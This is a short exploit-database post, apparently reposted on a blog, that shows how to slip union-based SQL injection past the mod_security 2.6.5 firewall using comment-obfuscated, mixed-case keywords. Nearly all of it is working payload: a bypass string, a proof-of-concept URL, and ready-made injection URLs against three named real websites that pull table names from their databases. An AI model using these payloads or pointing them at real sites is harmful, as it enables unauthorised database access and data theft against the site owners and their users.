# Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22]
Subscribe to:
Post Comments (Atom)
0 komentar:
Post a Comment